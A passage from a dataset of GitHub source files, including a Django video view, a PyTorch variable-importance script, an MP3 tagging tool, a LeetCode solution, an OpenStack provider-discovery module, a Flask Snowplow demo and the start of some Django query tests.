HttpResponseRedirect\n\tvideo=Video.objects.filter(video_part=1).order_by('?')[0]\n\turl=\"/videos/\"+video.url_friendly()\n\treturn HttpResponseRedirect(url)\n\t\n@login_required\ndef mark(request,video_pk=None):\n\tif request.user.is_authenticated():\n\t\tprofile=request.user.userprofile_set.all()[0]\n\t\taction_type=\"\"\n\t\tpk_to_mark=\"\"\n\t\turl=\"\"\n\t\t\n\t\tif (not video_pk is None and video_pk!=''):\n\t\t\turl=Video.objects.get(pk=int(video_pk)).url_friendly()+\"#interact_anchor\"\n\t\t\n\t\t#mac mai\n\t\tif ('action_type' in request.POST) and request.POST['action_type'].strip():\n\t\t\taction_type = request.POST['action_type']\n\n\t\tif ('video' in request.POST) and request.POST['video'].strip():\n\t\t\tpk_to_mark = request.POST['video']\n\t\t\n\t\tif (action_type!=\"\" and pk_to_mark!=\"\"):\n\t\t\tvideo=Video.objects.get(pk=int(pk_to_mark))\n\t\t\turl=video.url_friendly()\n\t\t\tif (action_type==\"mac\"):\n\t\t\t\tprofile.completed_videos.add(video)\n\t\t\tif (action_type==\"mai\"):\n\t\t\t\tprofile.completed_videos.remove(video)\n\t\treturn HttpResponseRedirect(\"/videos/\"+url)\n\t\n\telse:\n\t# Do something for anonymous users.\n\t\tpass\n","repo_name":"AkeelAli/HackerCS_Server","sub_path":"videos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17236816043","text":"import os\nimport csv\nimport sys\nimport numpy as np\nimport 
pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom ROOT import TFile, TTree, TBranch, TCanvas, TPad, gStyle, gFile, gROOT, TStyle, TH1D, TH2D, gDirectory, TProfile, TColor, TGraph, TLegend, THStack, TLatex\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\n\nsys.path.append('/home/matthew/Documents/Masters/Met_network/Networks')\nimport Network as mn\n\n######## The data set class must be defined for PyTorch to be able to read the data ########\nclass RootDataSet(Dataset):\n def __init__( self, root_folder, data_set_name, n_events = None, real = False ):\n \n self.my_file_name = os.path.join( root_folder, data_set_name )\n self.my_file = TFile.Open(self.my_file_name)\n \n self.my_tree = self.my_file.Get(\"var_tree\")\n self.n_events = n_events if n_events is not None else self.my_tree.GetEntries()\n\n self.branch_names = [ b.GetName() for b in self.my_tree.GetListOfBranches() ]\n \n def __getitem__(self, idx):\n self.my_tree.GetEntry(idx)\n truth = torch.tensor( [ getattr( self.my_tree, name ) for name in self.branch_names[1:3] ], dtype=torch.float32 )\n recon = torch.tensor( [ getattr( self.my_tree, name ) for name in self.branch_names[4:] ], dtype=torch.float32 )\n return recon, truth\n \n def __len__(self):\n return self.n_events\n\ndef main(): \n \n ####### ADJUSTABLE PARAMETERS ########\n network_base_dir = \"/home/matthew/Documents/Masters/Met_network/Networks/Saved_Networks/\"\n stats_base_dir = \"/home/matthew/Documents/Masters/Met_network/Data/Training/\"\n data_base_dir = \"/home/matthew/Documents/Masters/Met_network/Data/Evaluation/\"\n \n network_name = \"NonZero_Swish_5x1000_AM_L1_AA_XY_5e-06_Drop2\"\n activated_ann = mn.AMANNDA( \"Swish\", 5, 1000, 0.2, \"XY\", False ) # ( act, depth, width, dropout_p, out_type, btchnorm )\n stats_file = \"nonzero_data_stats.csv\"\n \n data_set_name = \"combined_evaluation.root\"\n \n real = 0\n n_events = 1 # None = all\n mini_batch_size = 1\n loss_fn = nn.MSELoss( reduction = \"mean\" )\n \n output_dir = \"Plots/{}/{}\".format(network_name,data_set_name[:-5])\n ######################################\n\n\n ########## The Neural Network is Loaded ##########\n activated_ann.load_state_dict(torch.load( network_base_dir + network_name + \"/network_model_optimal\" ) )\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n activated_ann = activated_ann.to(device)\n activated_ann.eval()\n\n\n ########## Loading normalisation data ##########\n stats_data = pd.read_csv( os.path.join( stats_base_dir, stats_file ), header = None ) \n means = torch.as_tensor( stats_data.iloc[1, 4:].values.astype(np.float32) )\n stdevs = torch.as_tensor( stats_data.iloc[2, 4:].values.astype(np.float32) )\n means = means.to(device)\n stdevs = stdevs.to(device)\n \n\n ########## Getting data from the files ##########\n data_set = RootDataSet( data_base_dir, data_set_name, n_events, real )\n data_loader = DataLoader( data_set, batch_size = mini_batch_size, num_workers = 1 )\n\n\n ######## Creating gradient containers which will convey importance ########\n average_gradients = torch.zeros( 63 )\n average_gradients = average_gradients.to( device )\n \n for batch_idx, (recon, truth) in enumerate( data_loader ):\n \n ## We first pass the batch onto the GPU\n recon = recon.to( device )\n truth = truth.to( device )\n \n ## The batch is then normalised together\n norm_recon = torch.div( ( recon - means ), stdevs )\n norm_recon.requires_grad_(True)\n \n ## The batch is passed through the network\n output = 
activated_ann( norm_recon )\n dummy = torch.zeros( output.size(), device = device )\n \n ## We split it into x and y values\n output_split = output.split( 1, dim=1 )\n output_x_values = output_split[0]\n output_y_values = output_split[1]\n \n truth_split = dummy.split( 1, dim=1 )\n truth_x_values = truth_split[0]\n truth_y_values = truth_split[1]\n \n ## Now we calculate the x gradients\n x_loss = loss_fn( output_x_values, truth_x_values )\n x_loss.backward( retain_graph=True )\n x_gradients = norm_recon.grad.abs()\n x_batch_gradients = x_gradients.mean(0)\n average_gradients += x_batch_gradients\n norm_recon.grad.data.zero_()\n \n ## Now we calculate the y gradients\n y_loss = loss_fn( output_y_values, truth_y_values )\n y_loss.backward( retain_graph=True )\n y_gradients = norm_recon.grad.abs()\n y_batch_gradients = y_gradients.mean(0)\n average_gradients += y_batch_gradients\n norm_recon.grad.data.zero_()\n \n print(\"Completed {}/{} \\r\".format(batch_idx, len(data_loader)), end=\"\" )\n sys.stdout.flush()\n print(\"Completed {}/{} \\n\".format(len(data_loader), len(data_loader)) )\n \n ## Copying data back to cpu\n average_gradients = average_gradients.cpu().numpy()\n average_gradients = average_gradients / average_gradients.max()\n \n ## Calculating the most important names\n indicies = average_gradients.argsort()[::-1]\n recon_names = data_set.branch_names[4:]\n ordered_names = [ recon_names[i] for i in indicies ]\n ordered_gradients = [ average_gradients[i] for i in indicies ]\n \n ## Plotting the bar graph of the top ten\n fig = plt.figure( figsize = (6,6) )\n ax_imprt = fig.add_subplot( 1 , 1 , 1 )\n \n number_to_show = 10\n x = np.arange(number_to_show)[::-1]\n \n ax_imprt.set_xlabel('Relative Importance')\n ax_imprt.barh( x, ordered_gradients[:number_to_show] )\n ax_imprt.set_yticks( x )\n ax_imprt.set_yticklabels( ordered_names[:number_to_show] )\n \n if not os.path.exists(output_dir):\n os.system(\"mkdir -p \" + output_dir)\n \n output_file = \"{}/Importance_def.svg\".format(output_dir)\n plt.title(\"Top 10 Variables\")\n plt.tight_layout()\n plt.savefig(output_file)\n \n \n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n","repo_name":"mattcleigh/Masters","sub_path":"Third_Stage/Run/Evaluation/Importance.py","file_name":"Importance.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27848871580","text":"#!/usr/bin/env python3\n\n# Written by Gem Newman. This work is licensed under the MIT License.\n\n\nfrom argparse import ArgumentParser\nfrom mutagen.easyid3 import EasyID3\nimport re, os\n\n\nPATTERN = r'^(\\d+).*\\.mp3'\np = re.compile(PATTERN)\n\n\ndef main():\n parser = ArgumentParser(\n description='Adds (or overwrites) the ID3 track number in any MP3 file'\n 'with a file name beginning with a number.')\n parser.add_argument(\"dir\", nargs='?', default='.',\n help='The directory to process. 
Defaults to \".\".')\n parser.add_argument(\"--file\", '-f', nargs='?', help='If provided, '\n 'processes a single file instead of the specified directory.')\n parser.add_argument(\"--verbose\", '-v', action='store_true')\n args = parser.parse_args()\n\n if args.file:\n files = [args.file]\n else:\n # List all files in the dir\n files = os.listdir(args.dir)\n\n # Filter to only those that match the pattern\n files = list(filter(p.match, files))\n\n for file in files:\n if args.verbose:\n print(file)\n\n track = int(p.match(file).group(1))\n\n if not track > 0:\n if args.verbose:\n print(f'Skipping invalid track number: {track}')\n continue\n\n # Append full path for files (since listdir only returns the filename)\n if not args.file:\n file = os.path.join(args.dir, file)\n\n audio = EasyID3(file)\n audio['tracknumber'] = str(track)\n audio.save()\n\n if args.verbose:\n print('Done')\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"spurll/tracknum","sub_path":"tracknum.py","file_name":"tracknum.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26879987284","text":"from typing import List\nfrom functools import lru_cache\n\n# Definition for a binary tree node.\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def deep_clone(self, tree: TreeNode) -> TreeNode:\n \"\"\" Similar to deep copy \"\"\"\n if not tree:\n return None\n new_tree = TreeNode(0)\n new_tree.left = self.deep_clone(tree.left)\n new_tree.right = self.deep_clone(tree.right)\n return new_tree\n\n @lru_cache(None)\n def allPossibleFBT(self, N: int) -> List[TreeNode]:\n \"\"\"\n if N = 7,\n think of the nodes as 1, 2, 3, 4, 5, 6, 7\n Even values cannot be lead nodes\n and all Odd values are leaf nodes\n \"\"\"\n if not(N & 1):\n return []\n elif N == 1:\n return [TreeNode(0)]\n rtn = []\n\n for i in range(2, N + 1, 2):\n left_branch = self.allPossibleFBT(i - 1)\n right_branch = self.allPossibleFBT(N - i)\n for left_count, left in enumerate(left_branch, 1):\n for right_count, right in enumerate(right_branch, 1):\n tree = TreeNode(0)\n\n tree.left = self.deep_clone(\n left) if right_count < len(right_branch) else left\n tree.right = self.deep_clone(\n right) if left_count < len(left_branch) else right\n\n rtn.append(tree)\n return rtn\n\n\n\"\"\"\nRuntime: 264 ms, faster than 38.88% of Python3 online submissions for All Possible Full Binary Trees.\nMemory Usage: 21.9 MB, less than 42.86% of Python3 online submissions for All Possible Full Binary Trees.\n\"\"\"\n","repo_name":"SamSamhuns/wallbreakers_projekts","sub_path":"Leetcode/week_4/p0894_all_possible_full_binary_trees.py","file_name":"p0894_all_possible_full_binary_trees.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"27043496336","text":"import pygame as pg\nimport pygame_gui as pgg\nfrom . 
import themes, window, gui, gui_definitions as gd\n\n\ndef main():\n done = False\n pg.init()\n window.init()\n themes.set_current_theme(\"dark_mode\")\n is_black = True\n current_gui = gui.generate(gd.menu_gui)\n\n def flip_theme():\n nonlocal is_black\n if is_black:\n themes.set_current_theme(\"light_mode\")\n else:\n themes.set_current_theme(\"dark_mode\")\n is_black = not is_black\n\n while not done:\n for ev in pg.event.get():\n gui.handle_event(ev)\n if ev.type == pg.QUIT:\n done = True\n elif ev.type == pg.KEYDOWN:\n if ev.key == pg.K_SPACE:\n pass\n elif ev.type == pgg.UI_BUTTON_PRESSED:\n if ev.ui_element is current_gui.quit:\n done = True\n elif ev.ui_element is current_gui.open:\n current_gui = gui.generate(gd.open_gui)\n elif ev.ui_element is current_gui.back:\n current_gui = gui.generate(gd.menu_gui)\n\n window.window.fill((0, 0, 0) if is_black else (255, 255, 255))\n\n gui.draw(window.window)\n gui.update()\n window.update()\n","repo_name":"gresm/cpaste_game_engine","sub_path":"editor/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27231153331","text":"import copy\nimport os\nfrom concurrent.futures import ThreadPoolExecutor\nfrom threading import Lock\nfrom typing import List, Optional\n\nfrom logger import logger\nfrom models.provider import (\n AuthMethod,\n Openstack,\n PrivateNetProxy,\n Project,\n TrustedIDP,\n)\nfrom openstack import connect\nfrom openstack.connection import Connection\n\nfrom app.provider.enum import ProviderStatus\nfrom app.provider.schemas_extended import (\n BlockStorageQuotaCreateExtended,\n BlockStorageServiceCreateExtended,\n ComputeQuotaCreateExtended,\n ComputeServiceCreateExtended,\n FlavorCreateExtended,\n IdentityServiceCreate,\n ImageCreateExtended,\n NetworkCreateExtended,\n NetworkQuotaCreateExtended,\n NetworkServiceCreateExtended,\n ProjectCreate,\n ProviderCreateExtended,\n RegionCreateExtended,\n SLACreateExtended,\n UserGroupCreateExtended,\n)\nfrom app.service.enum import (\n BlockStorageServiceName,\n ComputeServiceName,\n IdentityServiceName,\n NetworkServiceName,\n)\n\nTIMEOUT = 2 # s\n\nprojects_lock = Lock()\nregion_lock = Lock()\n\n\ndef get_block_storage_quotas(conn: Connection) -> BlockStorageQuotaCreateExtended:\n logger.info(\"Retrieve current project accessible block storage quotas\")\n quota = conn.block_storage.get_quota_set(conn.current_project_id)\n data = quota.to_dict()\n logger.debug(f\"Block storage service quotas={data}\")\n return BlockStorageQuotaCreateExtended(**data, project=conn.current_project_id)\n\n\ndef get_compute_quotas(conn: Connection) -> ComputeQuotaCreateExtended:\n logger.info(\"Retrieve current project accessible compute quotas\")\n quota = conn.compute.get_quota_set(conn.current_project_id)\n data = quota.to_dict()\n logger.debug(f\"Compute service quotas={data}\")\n return ComputeQuotaCreateExtended(**data, project=conn.current_project_id)\n\n\ndef get_network_quotas(conn: Connection) -> NetworkQuotaCreateExtended:\n logger.info(\"Retrieve current project accessible network quotas\")\n quota = conn.network.get_quota(conn.current_project_id)\n data = quota.to_dict()\n data[\"public_ips\"] = data.pop(\"floating_ips\")\n logger.debug(f\"Network service quotas={data}\")\n return NetworkQuotaCreateExtended(**data, project=conn.current_project_id)\n\n\ndef get_flavors(conn: Connection) -> List[FlavorCreateExtended]:\n logger.info(\"Retrieve current project accessible 
flavors\")\n flavors = []\n for flavor in conn.compute.flavors(is_disabled=False):\n logger.debug(f\"Flavor received data={flavor!r}\")\n projects = []\n if not flavor.is_public:\n for i in conn.compute.get_flavor_access(flavor):\n projects.append(i.get(\"tenant_id\"))\n data = flavor.to_dict()\n data[\"uuid\"] = data.pop(\"id\")\n if data.get(\"description\") is None:\n data[\"description\"] = \"\"\n extra = data.pop(\"extra_specs\")\n if extra:\n data[\"gpus\"] = int(extra.get(\"gpu_number\", 0))\n data[\"gpu_model\"] = extra.get(\"gpu_model\") if data[\"gpus\"] > 0 else None\n data[\"gpu_vendor\"] = extra.get(\"gpu_vendor\") if data[\"gpus\"] > 0 else None\n data[\"local_storage\"] = extra.get(\n \"aggregate_instance_extra_specs:local_storage\"\n )\n data[\"infiniband\"] = extra.get(\"infiniband\", False)\n logger.debug(f\"Flavor manipulated data={data}\")\n flavors.append(FlavorCreateExtended(**data, projects=projects))\n return flavors\n\n\ndef get_images(\n conn: Connection, tags: Optional[List[str]] = None\n) -> List[ImageCreateExtended]:\n if tags is None:\n tags = []\n logger.info(\"Retrieve current project accessible images\")\n images = []\n for image in conn.image.images(\n status=\"active\", tag=None if len(tags) == 0 else tags\n ):\n logger.debug(f\"Image received data={image!r}\")\n is_public = True\n projects = []\n if image.visibility in [\"private\", \"shared\"]:\n projects = [image.owner_id]\n is_public = False\n if image.visibility == \"shared\":\n members = list(conn.image.members(image))\n for member in members:\n if member.status == \"accepted\":\n projects.append(member.id)\n data = image.to_dict()\n data[\"uuid\"] = data.pop(\"id\")\n if data.get(\"description\") is None:\n data[\"description\"] = \"\"\n data[\"is_public\"] = is_public\n logger.debug(f\"Image manipulated data={data}\")\n images.append(ImageCreateExtended(**data, projects=projects))\n return images\n\n\ndef get_networks(\n conn: Connection,\n default_private_net: Optional[str] = None,\n default_public_net: Optional[str] = None,\n proxy: Optional[PrivateNetProxy] = None,\n tags: Optional[List[str]] = None,\n) -> List[NetworkCreateExtended]:\n if tags is None:\n tags = []\n logger.info(\"Retrieve current project accessible networks\")\n networks = []\n for network in conn.network.networks(\n status=\"active\", tag=None if len(tags) == 0 else tags\n ):\n logger.debug(f\"Network received data={network!r}\")\n project = None\n if not network.is_shared:\n project = conn.current_project_id\n data = network.to_dict()\n data[\"uuid\"] = data.pop(\"id\")\n if data.get(\"description\") is None:\n data[\"description\"] = \"\"\n if data.get(\"is_default\") is None:\n if (network.is_shared and default_public_net == network.name) or (\n not network.is_shared and default_private_net == network.name\n ):\n data[\"is_default\"] = True\n else:\n data[\"is_default\"] = False\n if proxy is not None:\n data[\"proxy_ip\"] = proxy.ip\n data[\"proxy_user\"] = proxy.user\n logger.debug(f\"Network manipulated data={data}\")\n networks.append(NetworkCreateExtended(**data, project=project))\n return networks\n\n\ndef get_project(conn: Connection) -> ProjectCreate:\n logger.info(\"Retrieve current project data\")\n project = conn.identity.get_project(conn.current_project_id)\n logger.debug(f\"Project received data={project!r}\")\n data = project.to_dict()\n data[\"uuid\"] = data.pop(\"id\")\n if data.get(\"description\") is None:\n data[\"description\"] = \"\"\n logger.debug(f\"Project manipulated data={data}\")\n return 
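# --- Editor's sketch (hypothetical, not part of the record above) ---
# get_flavors above flattens OpenStack flavor extra_specs into typed fields:
# gpu_number becomes an int, and gpu_model/gpu_vendor are only kept when at
# least one GPU is present. The same mapping applied to a plain dict:
def gpu_fields(extra_specs: dict) -> dict:
    gpus = int(extra_specs.get("gpu_number", 0))
    return {
        "gpus": gpus,
        "gpu_model": extra_specs.get("gpu_model") if gpus > 0 else None,
        "gpu_vendor": extra_specs.get("gpu_vendor") if gpus > 0 else None,
    }

assert gpu_fields({}) == {"gpus": 0, "gpu_model": None, "gpu_vendor": None}
assert gpu_fields({"gpu_number": "2", "gpu_vendor": "NVIDIA"})["gpu_vendor"] == "NVIDIA"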
ProjectCreate(**data)\n\n\ndef get_correct_idp_and_user_group_for_project(\n *,\n trusted_idps: List[TrustedIDP],\n os_conf_auth_methods: List[AuthMethod],\n project_conf: Project,\n) -> TrustedIDP:\n for trusted_idp in trusted_idps:\n for user_group in trusted_idp.user_groups:\n for sla in user_group.slas:\n if sla.doc_uuid == project_conf.sla:\n if project_conf.id not in sla.projects:\n sla.projects.append(project_conf.id)\n for auth_method in os_conf_auth_methods:\n if auth_method.endpoint == trusted_idp.endpoint:\n trusted_idp.relationship = auth_method\n return trusted_idp\n return trusted_idp\n\n logger.error(\n \"Configuration error: No matching Identity Provider \"\n f\"for project {project_conf.id}\"\n )\n raise\n\n\ndef get_per_project_details(\n os_conf: Openstack,\n project_conf: Project,\n region: RegionCreateExtended,\n trusted_idps: List[TrustedIDP],\n projects: List[ProjectCreate],\n) -> None:\n default_private_net = project_conf.default_private_net\n default_public_net = project_conf.default_public_net\n proxy = project_conf.private_net_proxy\n per_user_limits = project_conf.per_user_limits\n region_props = next(\n filter(\n lambda x: x.region_name == region.name,\n project_conf.per_region_props,\n ),\n None,\n )\n\n if region_props is not None:\n default_private_net = region_props.default_private_net\n default_public_net = region_props.default_public_net\n proxy = region_props.private_net_proxy\n per_user_limits = region_props.per_user_limits\n\n trusted_idp = get_correct_idp_and_user_group_for_project(\n os_conf_auth_methods=os_conf.identity_providers,\n trusted_idps=trusted_idps,\n project_conf=project_conf,\n )\n if trusted_idp is None:\n logger.error(f\"Skipping project {project_conf.id}.\")\n return\n\n logger.info(\n f\"Connecting through IDP {trusted_idp.endpoint} to openstack \"\n f\"'{os_conf.name}' and region '{region.name}'. 
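# --- Editor's sketch (hypothetical, not part of the record above) ---
# The nested search above returns the first trusted IdP whose user group holds
# an SLA matching the project's document uuid. Note that a bare `raise` with no
# active exception (as in the fall-through branch above) produces
# "RuntimeError: No active exception to re-raise"; raising an explicit error
# makes the failure mode clearer. The same first-match logic over plain dicts:
def find_idp(trusted_idps: list, sla_uuid: str) -> dict:
    for idp in trusted_idps:
        for group in idp["user_groups"]:
            if any(sla["doc_uuid"] == sla_uuid for sla in group["slas"]):
                return idp
    raise ValueError(f"no identity provider matches SLA {sla_uuid}")

idps = [{"user_groups": [{"slas": [{"doc_uuid": "abc"}]}]}]
assert find_idp(idps, "abc") is idps[0]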
\"\n f\"Accessing with project ID: {project_conf.id}\"\n )\n conn = connect(\n auth_url=os_conf.auth_url,\n auth_type=\"v3oidcaccesstoken\",\n identity_provider=trusted_idp.relationship.idp_name,\n protocol=trusted_idp.relationship.protocol,\n access_token=trusted_idp.token,\n project_id=project_conf.id,\n region_name=region.name,\n timeout=TIMEOUT,\n )\n logger.info(\"Connected.\")\n\n # Create region's compute service.\n # Retrieve flavors, images and current project corresponding quotas.\n # Add them to the compute service.\n compute_service = ComputeServiceCreateExtended(\n endpoint=conn.compute.get_endpoint(), name=ComputeServiceName.OPENSTACK_NOVA\n )\n compute_service.flavors = get_flavors(conn)\n compute_service.images = get_images(conn, tags=os_conf.image_tags)\n compute_service.quotas = [get_compute_quotas(conn)]\n if per_user_limits is not None and per_user_limits.compute is not None:\n compute_service.quotas.append(\n ComputeQuotaCreateExtended(\n **per_user_limits.compute.dict(exclude_none=True),\n project=project_conf.id,\n )\n )\n\n with region_lock:\n for i, region_service in enumerate(region.compute_services):\n if region_service.endpoint == compute_service.endpoint:\n uuids = [j.uuid for j in region_service.flavors]\n region.compute_services[i].flavors += list(\n filter(lambda x: x.uuid not in uuids, compute_service.flavors)\n )\n uuids = [j.uuid for j in region_service.images]\n region.compute_services[i].images += list(\n filter(lambda x: x.uuid not in uuids, compute_service.images)\n )\n region.compute_services[i].quotas += compute_service.quotas\n break\n else:\n region.compute_services.append(compute_service)\n\n # Retrieve project's block storage service.\n # Remove last part which corresponds to the project ID.\n # Retrieve current project corresponding quotas.\n # Add them to the block storage service.\n endpoint = conn.block_storage.get_endpoint()\n endpoint = os.path.dirname(endpoint)\n block_storage_service = BlockStorageServiceCreateExtended(\n endpoint=endpoint, name=BlockStorageServiceName.OPENSTACK_CINDER\n )\n block_storage_service.quotas = [get_block_storage_quotas(conn)]\n if per_user_limits is not None and per_user_limits.block_storage is not None:\n block_storage_service.quotas.append(\n BlockStorageQuotaCreateExtended(\n **per_user_limits.block_storage.dict(exclude_none=True),\n project=project_conf.id,\n )\n )\n\n with region_lock:\n for i, region_service in enumerate(region.block_storage_services):\n if region_service.endpoint == block_storage_service.endpoint:\n region.block_storage_services[i].quotas += block_storage_service.quotas\n break\n else:\n region.block_storage_services.append(block_storage_service)\n\n # Retrieve region's network service.\n network_service = NetworkServiceCreateExtended(\n endpoint=conn.network.get_endpoint(),\n name=NetworkServiceName.OPENSTACK_NEUTRON,\n )\n network_service.networks = get_networks(\n conn,\n default_private_net=default_private_net,\n default_public_net=default_public_net,\n proxy=proxy,\n tags=os_conf.network_tags,\n )\n network_service.quotas = [get_network_quotas(conn)]\n if per_user_limits is not None and per_user_limits.network is not None:\n network_service.quotas.append(\n NetworkQuotaCreateExtended(\n **per_user_limits.compute.dict(exclude_none=True),\n project=project_conf.id,\n )\n )\n\n with region_lock:\n for i, region_service in enumerate(region.network_services):\n if region_service.endpoint == network_service.endpoint:\n uuids = [j.uuid for j in region_service.networks]\n 
region.network_services[i].networks += list(\n filter(lambda x: x.uuid not in uuids, network_service.networks)\n )\n break\n else:\n region.network_services.append(network_service)\n\n # Retrieve provider's identity service.\n identity_service = IdentityServiceCreate(\n endpoint=os_conf.auth_url,\n name=IdentityServiceName.OPENSTACK_KEYSTONE,\n )\n with region_lock:\n for region_service in region.identity_services:\n if region_service.endpoint == identity_service.endpoint:\n break\n else:\n region.identity_services.append(identity_service)\n\n # Create project entity\n project = get_project(conn)\n with projects_lock:\n if project.uuid not in [i.uuid for i in projects]:\n projects.append(project)\n\n conn.close()\n logger.info(\"Connection closed\")\n\n\ndef get_provider(\n *, os_conf: Openstack, trusted_idps: List[TrustedIDP]\n) -> ProviderCreateExtended:\n \"\"\"Generate an Openstack virtual provider, reading information from a real openstack\n instance.\n \"\"\"\n if os_conf.status != ProviderStatus.ACTIVE:\n logger.info(f\"Provider={os_conf.name} not active: {os_conf.status}\")\n return ProviderCreateExtended(\n name=os_conf.name,\n type=os_conf.type,\n is_public=os_conf.is_public,\n support_emails=os_conf.support_emails,\n status=os_conf.status,\n )\n\n trust_idps = copy.deepcopy(trusted_idps)\n regions: List[RegionCreateExtended] = []\n projects: List[ProjectCreate] = []\n\n for region_conf in os_conf.regions:\n region = RegionCreateExtended(**region_conf.dict())\n thread_pool = ThreadPoolExecutor(max_workers=len(os_conf.projects))\n for project_conf in os_conf.projects:\n thread_pool.submit(\n get_per_project_details,\n os_conf=os_conf,\n project_conf=project_conf,\n region=region,\n trusted_idps=trust_idps,\n projects=projects,\n )\n thread_pool.shutdown(wait=True)\n regions.append(region)\n\n # Filter on IDPs and user groups with SLAs\n # belonging to at least one project\n for idp in trust_idps:\n user_groups = []\n for user_group in idp.user_groups:\n for sla in user_group.slas:\n if len(sla.projects) == 1:\n project = sla.projects[0]\n new_sla = SLACreateExtended(**sla.dict(), project=project)\n new_group = UserGroupCreateExtended(\n **user_group.dict(), sla=new_sla\n )\n user_groups.append(new_group)\n idp.user_groups = user_groups\n identity_providers = list(filter(lambda idp: len(idp.user_groups) > 0, trust_idps))\n\n # Remove from flavors and images' projects the ones\n # that have not been imported in the CMDB\n projects_uuid = [i.uuid for i in projects]\n for region in regions:\n for service in region.compute_services:\n for flavor in service.flavors:\n flavor.projects = list(\n filter(lambda x: x in projects_uuid, flavor.projects)\n )\n for image in service.images:\n image.projects = list(\n filter(lambda x: x in projects_uuid, image.projects)\n )\n\n return ProviderCreateExtended(\n name=os_conf.name,\n type=os_conf.type,\n is_public=os_conf.is_public,\n support_emails=os_conf.support_emails,\n status=os_conf.status,\n identity_providers=identity_providers,\n projects=projects,\n regions=regions,\n )\n","repo_name":"giosava94/catalog-api","sub_path":"scripts/providers/opnstk.py","file_name":"opnstk.py","file_ext":"py","file_size_in_byte":16523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20838476027","text":"from flask import Flask, render_template, request, redirect\nfrom snowplow_tracker import Emitter, Tracker\nfrom snowplow_tracker import SelfDescribingJson\n\napp = Flask(__name__)\n\nemail_addresses 
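# --- Editor's sketch (hypothetical, not part of the record above) ---
# get_provider above fans one worker out per project and lets the workers
# mutate shared region/project lists, which is why region_lock and
# projects_lock exist. The concurrency pattern in miniature:
from concurrent.futures import ThreadPoolExecutor
from threading import Lock

results, lock = [], Lock()

def worker(item: int) -> None:
    value = item * item        # stand-in for the per-project API calls
    with lock:                 # serialize writes to the shared list
        results.append(value)

with ThreadPoolExecutor(max_workers=4) as pool:
    for i in range(8):
        pool.submit(worker, i)
# Leaving the with-block joins all workers, like thread_pool.shutdown(wait=True) above.
assert sorted(results) == [i * i for i in range(8)]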
= []\ne = Emitter(\"localhost:8080\")\nt = Tracker(e, namespace=\"python\", app_id=\"hello_bears\")\n\n\n@app.route('/emails', methods=['GET'])\ndef emails():\n t.track_self_describing_event(SelfDescribingJson(\n \"iglu:com.hellobears/email_addresses_viewed/jsonschema/1-0-0\",\n {\n \"test\": \"stewart\"\n }\n ))\n return render_template('emails.html', email_addresses=email_addresses)\n\n\n@app.route('/signup', methods=['POST'])\ndef signup():\n email = request.form['email']\n email_addresses.append(email)\n\n t.track_self_describing_event(SelfDescribingJson(\n \"iglu:com.hellobears/email_address_submitted/jsonschema/1-0-0\",\n {\n \"email_address\": email\n }\n ))\n return redirect('/')\n\n\n@app.route('/')\ndef hello_world():\n t.track_page_view(\"www.hellobears.com\", \"Index\")\n return render_template('index.html')\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Kimblebrook/hello_bears","sub_path":"hello_flask.py","file_name":"hello_flask.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6307300465","text":"from datetime import datetime\n\nfrom django.core.exceptions import FieldError\nfrom django.db import DEFAULT_DB_ALIAS, connection\nfrom django.db.models import BooleanField, CharField, F, Q\nfrom django.db.models.expressions import (\n Col,\n Exists,\n ExpressionWrapper,\n Func,\n RawSQL,\n Value,\n)\nfrom django.db.models.fields.related_lookups import RelatedIsNull\nfrom django.db.models.functions import Lower\nfrom django.db.models.lookups import Exact, GreaterThan, IsNull, LessThan\nfrom django.db.models.sql.constants import SINGLE\nfrom django.db.models.sql.query import JoinPromoter, Query, get_field_names_from_opts\nfrom django.db.models.sql.where import AND, OR\nfrom django.test import SimpleTestCase, TestCase, skipUnlessDBFeature\nfrom django.test.utils import register_lookup\n\nfrom .models import Author, Item, ObjectC, Ranking\n\n\nclass TestQuery(SimpleTestCase):\n def test_simple_query(self):\n query = Query(Author)\n where = query.build_where(Q(num__gt=2))\n lookup = where.children[0]\n self.assertIsInstance(lookup, GreaterThan)\n self.assertEqual(lookup.rhs, 2)\n self.assertEqual(lookup.lhs.target, Author._meta.get_field(\"num\"))\n\n def test_non_alias_cols_query(self):\n query = Query(Author, alias_cols=False)\n where = query.build_where(Q(num__gt=2, name__isnull=False) | Q(num__lt=F(\"id\")))\n\n name_isnull_lookup, num_gt_lookup = where.children[0].children\n self.assertIsInstance(num_gt_lookup, GreaterThan)\n self.assertIsInstance(num_gt_lookup.lhs, Col)\n self.assertIsNone(num_gt_lookup.lhs.alias)\n self.assertIsInstance(name_isnull_lookup, IsNull)\n self.assertIsInstance(name_isnull_lookup.lhs, Col)\n self.assertIsNone(name_isnull_lookup.lhs.alias)\n\n num_lt_lookup = where.children[1]\n self.assertIsInstance(num_lt_lookup, LessThan)\n self.assertIsInstance(num_lt_lookup.rhs, Col)\n self.assertIsNone(num_lt_lookup.rhs.alias)\n self.assertIsInstance(num_lt_lookup.lhs, Col)\n self.assertIsNone(num_lt_lookup.lhs.alias)\n\n def test_complex_query(self):\n query = Query(Author)\n where = query.build_where(Q(num__gt=2) | 